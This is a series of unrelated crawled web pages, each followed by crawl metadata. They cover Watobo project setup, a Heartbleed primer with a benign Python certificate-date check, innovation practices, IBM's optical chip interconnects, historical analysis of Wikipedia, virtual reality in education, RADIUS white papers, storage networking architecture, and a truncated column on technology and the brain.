Lesson 1: Workspace, Project and Sessions
This lesson will teach you how to create/use a workspace, a project and a session. This part is mandatory to be able to use Watobo.
Watobo organizes the projects as follows:
- Workspace: physical path where project files will be saved.
- Project: projects are included in a workspace and contain sessions.
- Session: sessions are contained in a project.
Either click on the [+] icon or select File > New/Open from the menu. Then fill in the following screens:
<urn:uuid:23aefdcf-051b-430b-80ab-31e71c1fb0fa>
CC-MAIN-2017-09
https://www.aldeid.com/wiki/Watobo/Usage/Project-workspace-session
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172156.69/warc/CC-MAIN-20170219104612-00508-ip-10-171-10-108.ec2.internal.warc.gz
en
0.784484
116
2.703125
3
In the wake of widespread media coverage of the Internet security debacle known as the Heartbleed bug, many readers are understandably anxious to know what they can do to protect themselves. Here’s a short primer. The Heartbleed bug concerns a security vulnerability in a component of recent versions of OpenSSL, a technology that a huge chunk of the Internet’s Web sites rely upon to secure the traffic, passwords and other sensitive information transmitted to and from users and visitors. Around the same time that this severe flaw became public knowledge, a tool was released online that allowed anyone on the Internet to force Web site servers that were running vulnerable versions of OpenSSL to dump the most recent chunk of data processed by those servers. That chunk of data might include usernames and passwords, re-usable browser cookies, or even the site administrator’s credentials. While the exploit only allows for small chunks of data to be dumped each time it is run, there is nothing to prevent attackers from replaying the attack over and over, all the while recording fresh data flowing through vulnerable servers. Indeed, I have seen firsthand data showing that some attackers have done just that; for example, compiling huge lists of credentials stolen from users logging in at various sites that remained vulnerable to this bug. For this reason, I believe it is a good idea for Internet users to consider changing passwords at least at sites that they visited since this bug became public (Monday morning). But it’s important that readers first make an effort to determine that the site in question is not vulnerable to this bug before changing their passwords. Here are some resources that can tell you if a site is vulnerable: Continue reading →
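One rough signal, though not proof, that a site has both patched and replaced its keys is whether its TLS certificate was issued after the bug's public disclosure on April 7, 2014. Below is a minimal Python 3 sketch of that heuristic; the hostname is only an example, and a recent issue date by itself does not establish that a site was ever vulnerable or is now safe.

import socket
import ssl
from datetime import datetime

DISCLOSURE = datetime(2014, 4, 7)

def cert_issued_after_disclosure(host, port=443):
    """Return (issue_date, issued_after_disclosure) for the server's leaf certificate."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            cert = tls.getpeercert()
    # 'notBefore' holds the certificate's issue timestamp.
    issued = datetime.utcfromtimestamp(ssl.cert_time_to_seconds(cert["notBefore"]))
    return issued, issued > DISCLOSURE

if __name__ == "__main__":
    issued, reissued = cert_issued_after_disclosure("example.com")  # example host only
    print("certificate issued:", issued, "| issued after disclosure:", reissued)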
<urn:uuid:88c2afe4-2bc5-4b4e-90c3-51b9165c36b2>
CC-MAIN-2017-09
https://krebsonsecurity.com/tag/openssl/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.92/warc/CC-MAIN-20170219104611-00504-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947966
342
2.828125
3
Innovation is the process of inventing or introducing something new that adds value for our stakeholders (customers, employees, or shareholders). Innovation is a process of creation and execution that:
- Results in scalable, unique, differentiated solutions
- Targets existing and potential customers (both internal and external)
- Creates business value
- Is everyone's responsibility
Ideas can address a multitude of improvements and enhancements to existing services and products. Whether these ideas result in small or big changes, they are based on business needs and create business value that promotes innovation.
Categories of Innovation
Innovation starts from the existing customer/technology (inside the box) and goes to the new customer/technology (out of the box). The high-level flow runs from asking questions and generating ideas to prioritizing and implementing them; the focus is on volume first and then value. Common ideation techniques include:
- The Worst Idea Technique
- Questioning Assumptions/20 Questions
- The Wish Technique
In summary, innovation practices involve innovative teams asking provocative questions, seeking many points of view, learning from tests, and moving the most promising ideas forward to provide business value for the customer and the organization. Remember to ask open-ended questions. Happy Ideating!
<urn:uuid:54b29789-231e-47d8-a07e-9f58b475d2e8>
CC-MAIN-2017-09
https://www.hcltech.com/blogs/engineering-and-rd-services/promoting-and-nurturing-innovation
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171932.64/warc/CC-MAIN-20170219104611-00028-ip-10-171-10-108.ec2.internal.warc.gz
en
0.86777
255
2.671875
3
IBM scientists announced a breakthrough today that they claim could one day lead to a completely new way of handling communication between multiple CPU cores on a single die. IBM researchers have created a modulator that's one hundred to a thousand times smaller than prior modulators and is theoretically capable of using light pulses to transmit data between cores, rather than relying on traditional wires. Most reports have heralded this development as paving the way for supercomputers on a single chip, but at present, the technology is too big and has no supporting on-chip light source. That said, the long-term potential for such a technology is good. Chip-level optical routing would allow cores to communicate much faster than even the best wired connection (IBM estimates its nanophotonic technology would be 100 times faster) and would almost certainly eliminate any bandwidth-related bottlenecks within a single core. That might seem to be of limited use, since IBM has yet to describe a nanophotonic system for moving data between processors, but Big Blue believes that overcoming the heat generated by the use of connective wire between cores is a crucial step towards packing more cores on a single die. The process of transmitting data from core to core using IBM's optical modulator is described as follows:
- An input laser is focused on the optical modulator. A shutter in the output modulator keeps the light from passing through.
- The data signal to be transmitted is sent from the processor core (over a wire interconnect) to the optical modulator.
- The optical modulator's shutter begins to flicker, transforming the input laser's coherent beam into a series of pulses.
- These pulses are picked up by the other core's optical modulator, re-translated into a digital signal, and sent to the core.
- Wash, rinse, repeat.
Image courtesy of IBM
This isn't a technology that's going to turn up in the next generation or two of processor cores. In fact, the constraints on applying it there are quite strict. The waveguide structure needs to have a width that is on the order of the wavelength of the light used—IBM used 500nm wide waveguides, which is just about as small as you can go. The length of the device is also limited, in this case to one-half of the wavelength, and IBM's optical modulator is about 200 micrometers (µm) long. To put this in perspective, Intel is currently fabbing CPUs on a 45nm process. Clearly, if the cores are separated by 200-400µm, then there is both room and reason to implement optical interconnects. On the other hand, this is close to a ready-built optical bus between chips. Viewed in terms of bottlenecks, the main-memory-to-cache link may be the one this technology removes. That is not to say that this will never have a place inside the chip. Building a multicore CPU of the size and complexity IBM is envisioning will require a sea change in how processors and system-level interconnects are designed, and there is certainly a role for optical interconnects there. We covered this particular topic in some detail last April, during a conversation with Intel regarding its Terascale 80-core initiative. Even though the companies are different, the fundamental challenge of designing these types of products is largely the same, and Intel's work on a silicon laser indicates that they are thinking along the same lines.
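To make the shutter idea concrete, here is a deliberately simplified Python sketch of on-off keying: a bit pattern opens and closes a "shutter" that turns a steady carrier into pulses, and the receiver recovers the bits by thresholding. It is a toy illustration of the modulation concept only, not a model of IBM's device.

def modulate(bits, carrier_level=1.0):
    """Shutter open (bit 1) passes the carrier; shutter closed (bit 0) blocks it."""
    return [carrier_level if b else 0.0 for b in bits]

def demodulate(pulses, threshold=0.5):
    """Recover bits by thresholding the received light level."""
    return [1 if level > threshold else 0 for level in pulses]

if __name__ == "__main__":
    data = [1, 0, 1, 1, 0, 0, 1, 0]      # digital signal from the sending core
    light = modulate(data)                # series of optical pulses
    recovered = demodulate(light)         # digital signal at the receiving core
    assert recovered == data
    print(light, "->", recovered)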
One thing that isn't going to change between then and now, however, is the need for different cores on the same die to communicate. In that regard, IBM's new nanophotonic transmitter has a certain pertinence today, even if actual deployments of the technology lie far in the future. Chris Lee contributed to this story.
<urn:uuid:1a4a0875-b453-4249-a6d8-add05275b390>
CC-MAIN-2017-09
https://arstechnica.com/gadgets/2007/12/ibm-reveals-core-to-core-optical-dream-in-progress/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174154.34/warc/CC-MAIN-20170219104614-00380-ip-10-171-10-108.ec2.internal.warc.gz
en
0.952121
789
3.921875
4
One Giant Leap for Psychohistory
For science fiction buffs, many news items coming out of the world of predictive and large-scale historical analysis invoke Asimov's concept of Psychohistory, in which probabilistic group patterns can predict major future events in history. While big data platforms today may not be able to predict the eventual fall of Galactic Empires (although predicting revolutionary events from social data is a reality) they can generate insights based on large swaths of historical data. In particular, Kalev Leetaru from the University of Illinois carried out a fascinating historical analysis project where he mapped "the world according to Wikipedia" using SGI's UV2, a system which the company has touted as "the world's largest in-memory data mining system." Leetaru explains the genesis of the project below. Leetaru had already used similar analytics in publishing his Culturomics 2.0, where he, according to SGI, predicted the Arab Spring and the location of bin Laden's hideout. When he was approached by SGI's Michael Woodacre about the new UV2 system, which would apparently carry 4,000 processors and 64,000 terabytes of cache-coherent shared memory, he thought immediately of Wikipedia. "Wikipedia," Leetaru said, "has become such a fundamental part of our daily life. What could we do if we made a map of this or a series of maps over time?" So Leetaru set out to model the world according to Wikipedia's English-language edition. The task itself is simple to comprehend: essentially, Leetaru wanted to mark down every mention of a name, date, or place found in Wikipedia. "We used this UV2 system to pull out every geographic location across every page," said Leetaru, "every date across every page, and every connection among those, basically capturing the spatial and temporal view of history as captured by Wikipedia's pages…We can actually see history before our own eyes." Of course, there are over four million entries in the English version of Wikipedia, each of which has multiple references to any given date, place, or name. If those references are the neurons of Leetaru's project, the connections are the synapses. Leetaru had to deal with and analyze one heck of a historical neural net. UV2's impressive in-memory capabilities made this possible for Leetaru. "I didn't spend hours or days writing some fancy code that was distributed memory or using any of these fancy extensions, having to worry about memory management, allocating the right buffer sizes. I just wrote a ten line Perl script in a matter of minutes and just ran it… If I had to summarize the advantage of the UV2 platform in a single sentence, I think it would be 'Outcomes over algorithms.'" The outcome is represented in a fascinating infographic on SGI's Facebook page, which covers the number of date mentions per year, sentiment over time and much more. For example, the sentiment over time graph shows sharp dips around the 1860s, 1910s, and 1940s. Those dips correspond with the American Civil War (the sharpest dip, perhaps shedding some light on the American bias in English-language Wikipedia articles) and both World Wars. There are plenty more insights to be gleaned and plenty to be extrapolated. Leetaru's research shows that the world has become exponentially more interconnected over the last fifty years. This connectivity makes it easier to digitize human patterns and apply data analysis to them. Perhaps Asimov's psychohistory is not thousands of years away after all.
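Leetaru's script itself is not reproduced in the article, but the core idea of tallying date mentions across a mass of text fits in a few lines. The Python sketch below is an assumed, simplified stand-in: it counts four-digit year mentions per year across a list of page texts, which is roughly what the "date mentions per year" graph summarizes at vastly larger scale.

import re
from collections import Counter

YEAR = re.compile(r"\b(1[0-9]{3}|20[0-9]{2})\b")  # years 1000-2099

def year_mentions(pages):
    """Count how often each year is mentioned across all page texts."""
    counts = Counter()
    for text in pages:
        counts.update(int(y) for y in YEAR.findall(text))
    return counts

if __name__ == "__main__":
    sample = [
        "The war began in 1861 and ended in 1865.",
        "The treaty of 1918 followed the fighting of 1914-1918.",
    ]
    for year, n in sorted(year_mentions(sample).items()):
        print(year, n)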
<urn:uuid:d60ffc05-0f37-4bf3-bef7-ec45c81d6b80>
CC-MAIN-2017-09
https://www.datanami.com/2012/09/11/one_giant_leap_for_psychohistory/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174154.34/warc/CC-MAIN-20170219104614-00380-ip-10-171-10-108.ec2.internal.warc.gz
en
0.928364
783
2.921875
3
As Julie strolls through her virtual classroom space she has forgotten for the moment that the room her students occupy is simply a vacant shell. Seats and cubbies line the wall, but the room is empty except for the students. Nonetheless, one group of students is touring the Coliseum in Rome, another is visiting the Louvre in Paris. In the corner, a third group is participating in a dissection of Timurlengia euotica, a dinosaur of the Jurassic period. The fourth group is tackling advanced mathematical concepts dealing with time-varying three-dimensional solids. The objects and environment that the students and teacher are seeing and interacting with are visible by means of virtual or mixed reality presented through head-mounted displays. Virtual reality is fundamentally changing education. The exponentially-increasing power of computing, graphics display, audio processing, and tactile feedback have combined with wearable computing and the Internet of Things to create virtual environments so real the experience has been described as, “squeal-demanding, face-melting, mind-bending, and soul-rending.” The technology now bears no resemblance to early precursors like Nintendo Virtual Boy or Sega VR. Though the term virtual reality is most common, the version best suited to the classroom is mixed or augmented reality, which combines computer-generated objects with the real world. This enables students to see their hands touching virtual 3D objects. They also see the teacher and other students as they interact in the mixed reality world. Win Google Cardboard – take our short survey Share your thoughts on virtual reality. Spend two minutes on our survey and you’ll be entered into our drawing for Google Cardboard virtual reality headsets. If you are among the 10 names drawn from all the survey participants, we’ll send you a Google Cardboard kit to turn your smartphone into a virtual reality headset. All you have to do is participate in our short survey on virtual reality in education. The survey takes only 2-3 minutes to complete. Your responses are important whether or not you have personal experience with virtual reality. Ten Google Cardboards will be awarded. Take the survey now. Educators are already bringing VR into the classroom K-12 educators are finding new and diverse ways to improve teaching and learning with VR. From the beginning, Google has targeted their Google Cardboard, a very low cost (from $15) means of using existing smartphones for immersive VR, especially for K-12 educators. The free Expeditions Pioneer Program provides guided tours for up to 50 students at a time to places like Buckingham Palace, Machu Picchu and the Great Barrier Reef. Teachers at Hartshorn School in New Jersey take their students on tours of coral reefs and landscapes in places like Greece and Egypt. Virtual reality will have a growing role in helping to teach disabled students, children with learning disabilities, and students unable to attend school. Penn State engineering school has developed a virtual reality system that provides an immersive classroom experience to distance learning students. “So the Oculus Rift is fantastic. If you’ve used it in its original incarnation, you know that it’s incredible. It’s virtual reality done better than you’ve ever seen it before. It’s revolutionary. And it’s nothing compared to what’s coming next. I mean Oh. My. God.” – From I Wore the New Oculus Rift and I Never Want to Look at Real Life Again Colleges have begun offering courses specifically in VR design. 
The University of Maryland, College Park, launched a class on virtual reality that gives students the opportunity to design their own interactive world, work with 3D audio and experiment with immersive technology through a combination of hands-on learning and case studies. The University of Georgia offers similar classes in which students design and explore applications for VR. Conrad Tucker, an assistant professor of engineering at Pennsylvania State University, has received funding to build a virtual engineering lab where students hold, rotate, and fit together virtual parts as they would with their real hands. What virtual reality systems are available today? The concept of virtual reality received worldwide attention when Facebook announced their purchase of Oculus for $2B. Previous to that, Oculus had raised $2.4M on Kickstarter. But now VR was ready. That was two years ago. The Oculus Rift consumer versions have been shipping since March, but demand is so high that new orders have about a six week lead time. Samsung’s Gear VR is a step up from Google Cardboard, but is priced at $100 and is specifically designed to hold Samsung’s Galaxy S6, S7, and Note5. It runs Oculus software. Microsoft has begun shipping their Hololens augmented or mixed reality headset to software developers. The system blends holographic content into the physical world. The developer headsets are priced at $3,000, but they have not yet announced the consumer version pricing or when it will ship. Guesses at final pricing range from $500-$1500. Meta Company is selling developer kits of their Meta 2 augmented reality system for $949. Like Hololens, it adds 3D content to the real world as seen through the headset. No consumer release date has been yet announced. Magic Leap is probably generating the most anticipation of any high tech launches in recent history. The company is valued at $4.5 billion as of their last round of financing with major investments by Google, Alibaba, and Qualcomm. Their company uses the term mixed reality to describe their product’s ability to mix computer-generated 3D images with the real world. The company claims it creates the mixed reality images by projecting virtual elements from a light source at the edge of the glass, which are then reflected into the user’s eyes by beam-splitting nano-ridges. Additional noteworthy systems include Vive from the team of HTC and Valve, priced at $799 and shipping within three days of ordering; and Sony Playstation VR, slated to debut in October at the price of $499.99. In addition to revolutionizing education, will VR make us happier? Where will virtual reality lead? The positive, and hopefully most realistic view is that it will only improve our education system and enrich our lives. As ever-more possibilities for VR are thought up, each will be evaluated as either enhancing or detracting from our life experience and either included or discarded as appropriate. One fear is that advertising and commercialism could further invade our daily lives. This won’t happen as long as such intrusions are kept as opt-in only. This Hyper-Reality video by Keiichi Matsuda gives a dystopian view of what could happen by unchecked intrusion into a virtual reality future.
<urn:uuid:1ecfdda4-bc26-4b59-8147-a9e09f4659d8>
CC-MAIN-2017-09
https://content.extremenetworks.com/h/i/319064616-a-virtual-revolution-in-education
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170708.51/warc/CC-MAIN-20170219104610-00324-ip-10-171-10-108.ec2.internal.warc.gz
en
0.945498
1,380
3.5
4
AAA RADIUS Server White Papers
History of the AAA RADIUS Server and RADIUS Protocol
The story of how the RADIUS server and RADIUS protocol came into existence, became a de-facto standard, and eventually a recognized IETF standard. Starting from dial-in security needs at Merit Network, RADIUS wove its way through the standards process, first as a de-facto standard for NAS equipment vendors, and then through the IETF standards body to become the internationally recognized standard for network authentication, authorization, and accounting.
Introduction to Diameter
The Diameter protocol was designed to overcome some of the earlier shortcomings of RADIUS and is being adopted for an ever-expanding set of AAA requirements. This white paper provides an introduction to the Diameter protocol, its advantages over RADIUS, and the applications targeted by Diameter.
Link Layer and Network Layer Security for Wireless Networks
Wireless networking presents a significant security challenge. There is an ongoing debate about where to address this challenge: at the link layer (via 802.1X and a RADIUS server) or network layer (via VPN). This paper looks at the basic risks inherent in wireless networking and explains both approaches, but concludes that link layer security provides a more compelling, complete solution and that network layer security serves well as an enhancement in applications where additional WLAN security is requested.
Wireless LAN Access Control and RADIUS Server Authentication
Wireless networking is emerging as a significant aspect of Internetworking. It presents a set of unique issues based on the fact that the only boundary of a wireless network is the radio signal strength. There is no wiring to define membership in a network. Wireless networking, more than any other networking technology, needs an Authentication and Access Control mechanism. This paper looks at the access authentication issues, the existing and proposed technologies, and scenarios for use of a RADIUS Server for Wi-Fi Authentication.
Introduction to the RADIUS Server and 802.1x for Wireless Networks
Many new WiFi access points are advertised as employing IEEE 802.1X for enhanced security. Trade articles about this new technology call it a "security protocol," a "security feature," a "security standard," an "authentication method," or a "user authentication protocol" and promise "enhanced security" and a "more secure environment." These claims do not always provide an accurate picture of how 802.1X fits into WiFi security. Despite all the hype, 802.1X through a RADIUS server, if utilized properly, can indeed provide a WiFi network with a higher level of security.
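As a small illustration of what RADIUS authentication looks like on the wire, the Python sketch below builds a bare-bones Access-Request packet (per RFC 2865) with just a User-Name attribute. Real deployments add shared-secret-based password hiding (User-Password), a Message-Authenticator, NAS attributes, and retransmission logic, all of which the white papers above discuss; the user name here is a placeholder.

import os
import struct

ACCESS_REQUEST = 1   # RADIUS packet code for Access-Request
ATTR_USER_NAME = 1   # attribute type for User-Name

def access_request(identifier, username):
    """Build a minimal RADIUS Access-Request: fixed header plus a User-Name attribute."""
    authenticator = os.urandom(16)                         # 16-byte Request Authenticator
    value = username.encode("utf-8")
    attribute = struct.pack("!BB", ATTR_USER_NAME, 2 + len(value)) + value
    length = 20 + len(attribute)                           # 20-byte fixed header
    header = struct.pack("!BBH", ACCESS_REQUEST, identifier, length) + authenticator
    return header + attribute

if __name__ == "__main__":
    packet = access_request(identifier=1, username="alice")   # placeholder user
    print(len(packet), "bytes:", packet.hex())
    # A NAS would send this over UDP to the RADIUS server, typically on port 1812.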
<urn:uuid:36f24385-6537-4525-9874-7de250f8a2a5>
CC-MAIN-2017-09
https://www.interlinknetworks.com/aaa-white-papers/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171232.43/warc/CC-MAIN-20170219104611-00024-ip-10-171-10-108.ec2.internal.warc.gz
en
0.904825
553
3.09375
3
Storage networking is built on three fundamental components: wiring, storing, and filing. BY MARC FARLEY Storage networking provides storage applications on any number of suitable wiring technologies. In general, storage networking products have been associated with specific network technologies. Storage area network (SANs) have been associated with Fibre Channel technology, and network-attached storage (NAS) is considered to be an Ethernet technology. Unfortunately, identifying storage network technologies with specific data networks has not helped people understand the abstract architectural components of storage networking. (See InfoStor, September 2001, p. 28, for Part I of the book excerpt.) Storing and filing as network applications Filing is familiar as a client/server application where both client and server perform similar communications functions. For example, a server for one group of clients may itself be a client of some other server. It is strange to think about it as such, but on a communications level, not an application level, clients and servers are peers. Storing, however, is built on a different type of relationship. Storing-level communications is based on a master/slave model where host system initiators are master entities issuing commands and storage devices/ subsystems are slave entities responding to those commands. In general, the slave entities have much less flexibility than the masters that direct their operations. Notable exceptions to this arrangement include devices and subsystems with implemented embedded initiator functionality such as disk drives with integrated XOR processing and backup equipment with third-party-copy capabilities. Even in these cases, however, the embedded initiator in the device is used for specific applications and not for general-purpose storage communications. Figure 1: The hierarchy of storing and filing in a single system. There is an implied hierarchy between storing and filing, where users and applications access data on the filing level and where filing entities such as file systems and databases access the data on a storing level. This hierarchy exists as an internal relationship within nearly all systems used today. This hierarchy, along with the corresponding I/O stack functions, is depicted in Figure 1. Although a hierarchy exists between storing and filing, it is not always necessary for it to be implemented as in Figure 1. Filing can access the wiring function independently without first passing through a storing function, as shown below. The preceding drawing is the scenario usually used to show how NAS systems work. Analyzing the I/O path in more detail, however, one realizes the necessity for the client/server filing operation to be converted to a master/slave storing function and transmitted by the server over some sort of wiring to the destination storage devices. This conversion is done by a data structure function within the server's file system that determines where data is stored in the logical block address space of its devices or subsystems. For most NAS products today, the wiring function used for storing operations is a storage bus. When all the pieces of the I/O path are put together for NAS, we see that the NAS system provides filing services to network clients and incorporates some type of storing function, typically on independent sets of wiring, as shown above. 
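The hierarchy in Figure 1 can also be read as three small interfaces stacked on one another. The following Python sketch is a toy model, with all class and method names invented for illustration: the filing layer resolves names to logical block addresses, the storing layer issues master/slave block commands, and both ride on whatever wiring sits underneath. Nothing here models a real NAS product; it only illustrates why the layers can be separated.

class Wiring:
    """Transport only: moves opaque messages between endpoints."""
    def send(self, message):
        return message                      # stand-in for a bus or network hop

class Storing:
    """Master/slave block commands (initiator to device) over some wiring."""
    def __init__(self, wiring):
        self.wiring, self.blocks = wiring, {}
    def write(self, lba, data):
        self.blocks[lba] = self.wiring.send(data)
    def read(self, lba):
        return self.wiring.send(self.blocks.get(lba, b""))

class Filing:
    """Client/server access by name; maps names to logical block addresses."""
    def __init__(self, storing):
        self.storing, self.index, self.next_lba = storing, {}, 0
    def put(self, name, data):
        self.index[name] = self.next_lba
        self.storing.write(self.next_lba, data)
        self.next_lba += 1
    def get(self, name):
        return self.storing.read(self.index[name])

nas = Filing(Storing(Wiring()))             # filing stacked on storing, stacked on wiring
nas.put("report.txt", b"quarterly numbers")
print(nas.get("report.txt"))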
While individual NAS vendors and their particular products may have specific storing and wiring implementations, no architectural requirements for storing or wiring are implied by the NAS concept. Therefore, NAS is considered to be mostly a filing application that uses the services provided by storing and wiring. Although a particular NAS product may implement specific wiring and storage technology, the primary external function provided to customers is its filing capabilities. SAN as a storing application Storing functionality can be generalized as the master/slave interaction between initiators and devices. Storing is deterministic by design to ensure a high degree of accuracy and reliability. To some degree this is a function of the underlying wiring, but it is also a function of the command sequences and exchanges used in storing. Several storing technologies are available, the most common being the various flavors of SCSI commands. It can be very hard to separate the storing function from the wiring function when one looks for product examples. For instance, a Fibre Channel host bus adapter (HBA) is certainly a part of the wiring in a storage network, but it also provides functionality for processing SCSI-3 serial data frames. It is important to realize that the SCSI-3 protocol was developed independently of Fibre Channel technology and that nothing inherent in SCSI-3 ties it to Fibre Channel. It is independent of the wiring function and could be implemented on Ethernet or many other types of network. Similarly, there is no reason another serial SCSI implementation could not be developed and used with Fibre Channel or any other networking technology. In fact, there is no reason that SCSI has to be part of the equation at all. It is one of the easiest storing technologies to adopt because it has been defined for serial transmission, but there certainly are other ways to control devices and subsystems. So what is a SAN? It is the application of storing functionality over a network. SANs by definition exclude bus types of wiring. SANs provide deterministic control of storage transmissions, according to the implementation details of the storing protocol used and the capabilities of the underlying network. Aligning the building blocks of storage networking Storage networking is certainly not "child's play," but that doesn't mean we can't approach it that way. Certainly the SAN industry has made a number of ridiculous puns and word games surrounding SAN and sand, so with that as an excuse, we'll discuss building blocks. The three building blocks we are interested in, of course, are these: As discussed previously, the implied and traditional hierarchy of these building blocks within a single system is to place wiring on the bottom and filing on top, such that storing gets to be the monkey in the middle, like this: Of course, in the worlds of NAS and SAN, these blocks have been assembled like this: But if we want to take a detailed view of NAS, we know that NAS actually has a storing component as well, which is often parallel SCSI, and we place the building blocks within client and server respectively, like this: But as we've been saying in this article, wiring is independent from both storing and filing and, in fact, can be the same for both. So we've structured the building blocks of filing (NAS) and storing (SAN) on top of a common wiring, like this: Now the preceding drawing is probably only interesting in theory, as something to illustrate the concept. 
In actual implementations, it is probably a good idea to segregate client/server traffic from storage traffic. This provides the capability to optimize the characteristics of each network for particular types of traffic, costs, growth, and management. That said, it might also be a good idea to base the two different networks on the same fundamental wiring technology. This allows organizations to work with a single set of vendors and technologies. As long as a common wiring technology can actually work for both types of networks, there is the potential to save a great deal of money in the cost of equipment, implementation, training, and management. This type of environment, shown in Figure 2, includes a storage device as the final destination on the I/O path. Race for wiring supremacy Three networking technologies have the potential to provide a common wiring infrastructure for storage networks. The first is Fibre Channel, the next is Ethernet, particularly Gigabit Ethernet, and the third is InfiniBand. We'll make a brief comparison of their potential as a common wiring for storage networks. Figure 2: Common wiring, but separate networks for filing and storing. Fibre Channel strength Fibre Channel's primary strengths are precisely where Ethernet has weaknesses. It is a high-speed, low-latency network with advanced flow control technology to handle bursty traffic such as storage I/O. However, its weaknesses are the major strengths of Ethernet. The Fibre Channel industry is still small compared to Ethernet, with limited technology choices and a relatively tiny talent pool for implementing and managing installations. The talent pool in Fibre Channel is heavily concentrated in storage development companies that have a vested interest in protecting their investment in Fibre Channel technology. This does not mean that these companies will not develop alternative wiring products, but it does mean that they will not be likely to abandon their Fibre Channel products. Of the three technologies discussed here, Fibre Channel was the first to develop legitimate technology for common wiring. But technology alone does not always succeed, as has been proven many times throughout our history. The Fibre Channel industry has never appeared interested in its potential as a common wiring. Although it has a technology lead, having begun as the de facto standard for SANs, it is extremely unlikely that Fibre Channel will cross over to address the NAS, client/server market. Ethernet has the obvious advantage of being the most widely deployed networking technology in the world. There is an enormous amount of talent and technology available to aid the implementation and management of Ethernet networks. While the 10Mbps and 100Mbps Ethernet varieties are sufficient for NAS, they are probably not realistic choices to support SANs because of their overall throughput limitations and lack of flow control implementations. Therefore, Gigabit Ethernet would likely be the ground floor for storing applications such as SANs. However, even though Gigabit Ethernet has the raw bandwidth and flow control needed for storage I/O, most Gigabit Ethernet switches do not have low enough latency to support high-volume transaction processing. There is little question that Ethernet will be available to use as a common wiring for both filing and storing applications, but its relevance as an industrial-strength network for storing applications has to be proved before it will be deployed broadly as an enterprise common wiring infrastructure. 
InfiniBand in the wings The latest entrant in the field is InfiniBand, the serial bus replacement for the PCI host I/O bus. InfiniBand's development has been spearheaded by Intel with additional contributions and compromises from Compaq, Hewlett-Packard, IBM, Sun, and others. As a major systems component expected to be implemented in both PC and Unix platforms, InfiniBand is likely to become rapidly deployed on a large scale. In addition, a fairly large industry is developing the equivalent of HBAs and network interface cards for InfiniBand. Therefore, InfiniBand is likely to grow a sizable talent pool rapidly. In relation to storage networks, the question is: Will storing and/or filing applications run directly across InfiniBand wiring, as opposed to requiring some sort of InfiniBand adapter? Immediately, soon, years away, or never? The technology probably needs to gain an installed base as a host I/O bus before it can effectively pursue new markets such as storage networking. However, InfiniBand certainly has the potential to become a legitimate storage wiring option at some point in the future. As the apparent method of choice for connecting systems together in clusters, along with their associated storage subsystems, this could happen sooner than expected. As with any other networking technology, it is not so much a question of whether the technology can be applied but rather when attempts will be made and by whom with what resources. There aren't any crystal balls to predict the future of storage networking. However, any time functions can be integrated together in a way that reduces cost and complexity, the only question is whether it can be marketed successfully. Common wiring is more than a theoretical abstraction for storage networks, but it represents a large opportunity to integrate data networks and storage channels under a single technology umbrella. As Fibre Channel, Ethernet, and InfiniBand technologies evolve in response to this integration gravity, it is almost inevitable that NAS and SAN developers will look for ways to combine functionality, and their products will look more and more alike. The terms NAS and SAN will seem completely arbitrary or obsolete, and it will be necessary to distinguish storage products by the storing and filing applications they provide, as opposed to the limitations of their initial implementations. At that point, a whole new level of storing/filing integration will become visible and true self-managing storage networks may be possible. But first, the wiring slugfest! The table briefly summarizes the competing technologies that could be used to form a common wiring and their current status. This article discusses the fundamental components of storage networks-wiring, storing, and filing-in relation to the most common applications of storage networks today: NAS and SAN. More than just the similarity of the acronyms used, NAS and SAN have confused the industry and the market because of their similarities and the lack of an architectural framework to view them in. NAS, the application of filing over a network, has two important roles. First, it provides a service that allows applications and users to locate data as objects over a network. Second, it provides the data structure to store that data on storage devices or subsystems that it manages. SAN, on the other hand, is the application of storing functions over a network. 
In general, this applies to operations regarding logical block addresses, but it could potentially involve other ways of identifying and addressing stored data. Wiring for storage networks has to be extremely fast and reliable. Fibre Channel is the incumbent to date, but Gigabit Ethernet and InfiniBand are expected to make runs at the storage network market in years to come. The development of a common wiring infrastructure for both filing (NAS) and storing (SAN) applications appears to be inevitable, and it will deliver technology and products that can be highly leveraged throughout an organization. Marc Farley is a storage professional and author of Building Storage Networks, First and Second Editions. This article is excerpted with permission from Building Storage Networks, Second Edition, by Marc Farley (Osborne/ McGraw-Hill, ISBN 0-07-213072-5, copyright 2001).
<urn:uuid:2f231be6-5558-479a-b347-d81292b749ff>
CC-MAIN-2017-09
http://www.infostor.com/index/articles/display/123544/articles/infostor/volume-5/issue-10/features/part-ii-building-storage-networks-a-book-excerpt.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00200-ip-10-171-10-108.ec2.internal.warc.gz
en
0.948459
2,830
2.921875
3
GCN LAB IMPRESSIONS Can talking about technology make you smarter? - By Greg Crowe - Jun 27, 2011 You can debate whether technology makes us smarter or just gives us more data to process. But apparently, talking about technology could actually improve the human brain. New findings released by archaeologists at Lund University in Sweden indicate that developing or even communicating about new technologies has led to developments in the way we think and behave as a species. They discovered that, although homo sapiens have lived on the planet for about 200,000 years, it was only about 100,000 years ago that advanced tool-making technology, for crafting things such as spearheads, came about. In order to reach that plateau, the study says, increased social interaction had to occur, and over generations, the actual makeup of our brains altered. So, in essence, people getting together, planning and talking about technology had a positive impact on the physical structure of our brains — that is, talking about it made us naturally smarter. And each generation was more adapted to the new technology than the last and, hence, smarter still. Evidence of this exists today. Anyone who has ever witnessed a preteen teaching his or her grandparents how to get online to check their e-mail or even program their digital video recorder will tell you that the new generation tends to be more tech-savvy than the one before it. Some could argue that it is simply that younger generations are exposed to technology at an earlier age, thus making them more practiced. And although that might be true to a certain extent, these new findings seem to indicate that there is also a biological predilection for younger generations to be smarter than older ones. Of course, any live experiment to prove this would no doubt involve raising control subject children in isolation and periodically introducing technology to them to see what they do with it. And that would probably get the torch-and-pitchfork crowd chasing after the scientist in charge of said experiment. But if anyone does decide to run such an experiment, it would be an ideal environment to also run my long-term cell phone exposure effects experiment. Wait...torches...pitchforks...on second thought, forget I said anything. So in light of these new findings, the staff here at GCN 